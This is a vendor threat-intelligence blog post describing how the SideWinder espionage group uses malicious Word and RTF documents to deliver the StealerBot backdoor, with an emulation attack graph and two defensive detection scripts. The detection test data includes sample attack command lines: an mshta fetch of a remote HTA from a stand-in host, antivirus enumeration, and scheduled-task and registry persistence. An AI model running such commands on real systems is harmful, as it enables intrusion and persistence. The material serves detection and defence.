Emulating the Espionage-Oriented Group SideWinder
2025-11-13 21:3:4 Author: securityboulevard.com (view original)

SideWinder is a long-running threat actor active since at least 2012, primarily engaged in cyber-espionage. It has been observed targeting military and government entities, as well as ports and maritime facilities across the Indian Ocean and Mediterranean Sea, including Pakistan, Egypt, Sri Lanka, Bangladesh, Myanmar, Nepal and the Maldives.

Initial access is typically obtained via spear-phishing emails carrying malicious documents that impersonate trusted organizations. These documents use remote template injection (CVE-2017-0199): the .DOCX points at an external template, and Word fetches an RTF from the attacker's server when the file is opened. That RTF contains embedded shellcode exploiting CVE-2017-11882 in the Equation Editor. The shellcode performs environment checks to detect virtualization or analysis systems; if the host passes those checks, it decodes and executes a small JavaScript payload fetched from a remote server. This payload connects to a malicious URL to retrieve additional malware stages or to exploit further vulnerabilities.
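To make the delivery mechanism concrete, the following is an added example, not code from AttackIQ or from the SideWinder toolset, that scans a .docx for the external-template relationship this technique relies on. Word records the attached template as a relationship of type attachedTemplate in word/_rels/settings.xml.rels; a remote template carries TargetMode="External" and an http(s) or UNC target. The documents it inspects are built in memory by build_docx() with a placeholder URL. It goes slightly beyond the paragraph above by also flagging external oleObject relationships in word/_rels/document.xml.rels, the other well-known CVE-2017-0199 vector.

```python
"""Detect remote-template injection (the CVE-2017-0199 delivery pattern) in a .docx.

Added example; the sample documents are constructed here, the URL is a placeholder.
"""
import io
import re
import xml.etree.ElementTree as ET
import zipfile

PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
WORD_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"

# Relationship types that make Word fetch content when the document opens.
FETCHED_TYPES = {OFFICE_REL + "attachedTemplate", OFFICE_REL + "oleObject"}
# Relationship parts that can carry such a pointer.
RELS_PARTS = ("word/_rels/settings.xml.rels", "word/_rels/document.xml.rels")
REMOTE_TARGET = re.compile(r"^(https?://|file://|\\\\)", re.IGNORECASE)


def find_remote_templates(docx_bytes):
    """Return a finding for every attachedTemplate/oleObject relationship whose
    target is external (TargetMode="External" or a URL/UNC path)."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        names = set(zf.namelist())
        for part in RELS_PARTS:
            if part not in names:
                continue
            root = ET.fromstring(zf.read(part))
            for rel in root.iter("{%s}Relationship" % PKG_REL_NS):
                rtype = rel.get("Type", "")
                target = rel.get("Target", "")
                external = rel.get("TargetMode", "").lower() == "external"
                if rtype in FETCHED_TYPES and (external or REMOTE_TARGET.match(target)):
                    findings.append({
                        "part": part,
                        "id": rel.get("Id"),
                        "type": rtype.rsplit("/", 1)[-1],
                        "target": target,
                    })
    return findings


def build_docx(template_target=None, external=True):
    """Constructed minimal .docx for the demonstration. With template_target set,
    word/settings.xml points at that template through a relationship, exactly as a
    remote-template lure does."""
    settings = '<w:settings xmlns:w="%s" xmlns:r="%s">' % (WORD_NS, OFFICE_REL[:-1])
    rels = '<Relationships xmlns="%s">' % PKG_REL_NS
    if template_target:
        settings += '<w:attachedTemplate r:id="rId1"/>'
        rels += ('<Relationship Id="rId1" Type="%sattachedTemplate" Target="%s"%s/>'
                 % (OFFICE_REL, template_target,
                    ' TargetMode="External"' if external else ""))
    settings += "</w:settings>"
    rels += "</Relationships>"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml",
                    '<w:document xmlns:w="%s"><w:body/></w:document>' % WORD_NS)
        zf.writestr("word/settings.xml", settings)
        zf.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    for label, doc in (("benign", build_docx()),
                       ("local template", build_docx("Normal.dotm", external=False)),
                       ("remote template", build_docx("http://lure.example/template.rtf"))):
        print(label, find_remote_templates(doc))
```

A local template such as Normal.dotm (no TargetMode, relative target) is not flagged, so the check can run as a mail-gateway or EDR pre-filter on every inbound .docx; because the fetched RTF changes per download (see the infrastructure notes below), the relationship itself is the stable artifact to key on rather than the RTF's hash.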


The delivery infrastructure exhibits a level of sophistication aimed at evading detection and hindering analysis: geofencing returns an empty RTF to non-targeted requests, delivery and payload URLs are short-lived and routinely rotated (often unique per campaign or target set), and servers generate payloads on the fly so each download produces a file with a unique hash. These measures together reduce the usefulness of static indicators and increase the difficulty of sample correlation and analysis.

The observed final payload, known as StealerBot, is a modular memory-resident backdoor designed for espionage. It operates entirely in memory, with decrypted components injected directly by the loader to avoid disk artifacts.

AttackIQ has released a new attack graph that emulates the Tactics, Techniques, and Procedures (TTPs) SideWinder uses to deliver and run its tooling, to help customers validate their security controls and their ability to defend against this threat.

Validating your security program performance against these behaviors is vital in reducing risk. By using this new attack graph in the AttackIQ Security Optimization Platform, security teams will be able to:

  • Evaluate security control performance against baseline behaviors associated with SideWinder.
  • Assess their security posture against a prolific and sophisticated adversary.
  • Continuously validate detection and prevention pipelines against a threat that conducts espionage campaigns across multiple sectors and regions.

Sidewinder – 2025-05 – Malicious Office Document Delivers StealerBot

This emulation replicates the sequence of behaviors associated with the deployment of SideWinder's tooling on a compromised system, giving customers the opportunity to detect and/or prevent a compromise in progress.

Initial Access & Execution – Malware Delivery

In this stage, a malicious Office document (.DOCX) is downloaded and saved to the system. Next, a Rich Text Format (.RTF) file is dropped to disk and a remote HTA is executed via mshta.exe. Finally, system memory is checked via GlobalMemoryStatusEx, the kind of environment check the shellcode uses to spot low-memory sandboxes.

2025-05 SideWinder .DOCX Sample (T1105): The SideWinder .DOCX Sample (SHA256: 57b9744b30903c7741e9966882815e1467be1115cbd6798ad4bfb3d334d3523d) is downloaded to memory and saved to disk in two separate scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.

2025-02 SideWinder .RTF Sample (T1105): The SideWinder .RTF Sample (SHA256: d9e373aeea5fe0c744f0de94fdd366b5b6da816209ac394cbbda1c64c03b50b1) is saved to disk to test endpoint controls and their ability to prevent the delivery of known malicious samples.

Download and Execute Remote Payload with MSHTA (T1218.005): This scenario downloads and executes a remote Microsoft HTML Application (HTA) from an AttackIQ-controlled web server; the HTA contains embedded Visual Basic Script (VBS) code that creates a canary file on the compromised file system.

System Information Discovery via “GlobalMemoryStatusEx” Native API (T1082): This scenario executes the GlobalMemoryStatusEx Windows API call to gather information about physical and virtual memory.

Execution & Persistence – Malware Execution

In this stage, the Windows Management Instrumentation Command-line (WMIC) is executed to retrieve the list of antivirus products installed on the system. Next, a payload is executed using pcalua.exe. Finally, persistence is established through either scheduled tasks or registry run keys as a fallback.

Discover Security Software (AntiVirusProduct) using WMI Command (T1518.001): This scenario uses the native Windows Management Instrumentation Command-line (WMIC) to query the AntiVirusProduct class (in the root\SecurityCenter2 namespace) and determine which antivirus products are registered on the system.

Indirect Command Execution using “pcalua.exe” Script (T1202): This scenario abuses pcalua.exe, the Program Compatibility Assistant launcher, to execute a file indirectly (pcalua.exe -a <file>), so the payload's parent process is a trusted Windows binary.

Persistence Through Scheduled Task (T1053.005): This scenario creates a new scheduled task for persistence using the schtasks utility.

Persistence Through Registry Run and RunOnce Keys (T1547.001): This scenario creates an entry under the HKLM\Software\Microsoft\Windows\CurrentVersion\Run registry key so the payload is launched at every user logon, acquiring persistence.

Execution – StealerBot Deployment

In this stage, the Backdoor Loader is deployed to the system. Then, DLL side-loading is performed, with a legitimate executable loading the malicious library. Finally, the unencrypted version of StealerBot is dropped and saved to disk.

2024-12 SideWinder Backdoor Loader (vsstrace.dll) Sample (T1105): The SideWinder Backdoor Loader (vsstrace.dll) Sample (SHA256: 44ff1117bb0167f85d599236892deede636c358df3d8908582a6ce6a48070bd4) is downloaded to memory and saved to disk in two separate scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.

DLL Side-Loading (T1574.002): This scenario leverages a legitimate and trusted executable to load a malicious Dynamic-link Library (DLL).

2025-05 SideWinder StealerBot Unencrypted Sample (T1105): The unencrypted SideWinder StealerBot sample is saved to disk to test endpoint controls and their ability to prevent the delivery of known malicious samples.
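Pulling the second and third stages together, the following is an added example, not AttackIQ's attack graph content or any SideWinder code, of the detection logic a SOC would run over endpoint telemetry for these behaviors. The events are constructed Sysmon-style records (EventID 1 process creation, 7 image load, 13 registry value set); every path, name and URL in them is invented, and SYSTEM32_DLLS is an assumed list of DLL names that should only ever load from the Windows system directories. It generalizes slightly beyond the page: the run-key rule catches any writer of the key, not just a command-line tool, and the side-load rule fires for any system-resident DLL name loaded from elsewhere, not only vsstrace.dll.

```python
"""Map constructed endpoint telemetry to the SideWinder stage 2/3 TTPs.

Added example. Field names follow Sysmon; all values are invented.
"""
import re

# Assumed: DLL names that legitimately live only under the Windows system
# directories; one loaded from elsewhere is a side-loading candidate
# (vsstrace.dll is the loader name given for the StealerBot stage).
SYSTEM32_DLLS = {"vsstrace.dll", "version.dll", "dbghelp.dll", "wtsapi32.dll"}
SYSTEM_DIRS = re.compile(r"^[a-z]:\\windows\\(system32|syswow64)\\", re.IGNORECASE)
RUN_KEY = re.compile(r"\\currentversion\\run(once)?\\", re.IGNORECASE)

# Process-creation rules: (technique, image basename, pattern over CommandLine).
PROCESS_RULES = [
    ("T1218.005", "mshta.exe", re.compile(r"https?://", re.IGNORECASE)),
    ("T1518.001", "wmic.exe", re.compile(r"antivirusproduct|securitycenter2", re.IGNORECASE)),
    ("T1202", "pcalua.exe", re.compile(r"(^|\s)-a\s+\S", re.IGNORECASE)),
    ("T1053.005", "schtasks.exe", re.compile(r"/create\b", re.IGNORECASE)),
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return [(technique, event_index, detail)] for every event that matches a rule."""
    hits = []
    for idx, ev in enumerate(events):
        eid = ev["EventID"]
        if eid == 1:  # process creation
            image = basename(ev["Image"])
            cmd = ev.get("CommandLine", "")
            for technique, exe, pattern in PROCESS_RULES:
                if image == exe and pattern.search(cmd):
                    hits.append((technique, idx, cmd))
        elif eid == 7:  # image load
            loaded = ev["ImageLoaded"]
            if basename(loaded) in SYSTEM32_DLLS and not SYSTEM_DIRS.match(loaded):
                hits.append(("T1574.002", idx, "%s loaded %s" % (ev["Image"], loaded)))
        elif eid == 13:  # registry value set
            if RUN_KEY.search(ev["TargetObject"]):
                hits.append(("T1547.001", idx, ev["TargetObject"]))
    return hits


# Constructed Sysmon-style telemetry; paths, names and the URL are invented.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"mshta.exe http://lure.example/template.hta"},
    {"EventID": 1, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r"wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName"},
    {"EventID": 1, "Image": r"C:\Windows\System32\pcalua.exe",
     "CommandLine": r"pcalua.exe -a C:\Users\Public\update.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r"schtasks /create /sc minute /mo 5 /tn Updater /tr C:\Users\Public\update.exe"},
    {"EventID": 13, "Image": r"C:\Users\Public\update.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater"},
    {"EventID": 7, "Image": r"C:\Users\Public\Sync\signed_host.exe",
     "ImageLoaded": r"C:\Users\Public\Sync\vsstrace.dll"},
    # Benign look-alikes that the rules must not flag.
    {"EventID": 7, "Image": r"C:\Windows\System32\svchost.exe",
     "ImageLoaded": r"C:\Windows\System32\vsstrace.dll"},
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\setup.hta"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r"wmic os get Caption"},
]

if __name__ == "__main__":
    for technique, idx, detail in detect(SAMPLE_EVENTS):
        print(technique, idx, detail)
```

Each rule keys on the behavior rather than on a file hash, which matters here because the infrastructure rotates payloads per download; the side-load rule in particular should be fed by the same image-load telemetry the emulation's T1574.002 scenario exercises, since the loader DLL on disk may be unique per victim while the "system DLL name loaded from a user-writable path" pattern is not.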

Wrap-up

In summary, this emulation will evaluate security and incident response processes and support the improvement of your security control posture against the behaviors exhibited by SideWinder. With data generated from continuous testing and use of this assessment template, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a known and dangerous threat.

AttackIQ, the leading provider of Adversarial Exposure Validation (AEV) solutions, is trusted by top organizations worldwide to validate security controls in real time. By emulating real-world adversary behavior, AttackIQ closes the gap between knowing about a vulnerability and understanding its true risk. AttackIQ’s AEV platform aligns with the Continuous Threat Exposure Management (CTEM) framework, enabling a structured, risk-based approach to ongoing security assessment and improvement. The company is committed to supporting its MSSP partners with a Flexible Preactive Partner Program that provides turn-key solutions, empowering them to elevate client security. AttackIQ is passionate about giving back to the cybersecurity community through its free award-winning AttackIQ Academy and founding research partnership with MITRE Center for Threat-Informed Defense.

*** This is a Security Bloggers Network syndicated blog from AttackIQ authored by Ayelen Torello. Read the original post at: https://www.attackiq.com/2025/11/13/emulating-sidewinder/


Source: https://securityboulevard.com/2025/11/emulating-the-espionage-oriented-group-sidewinder/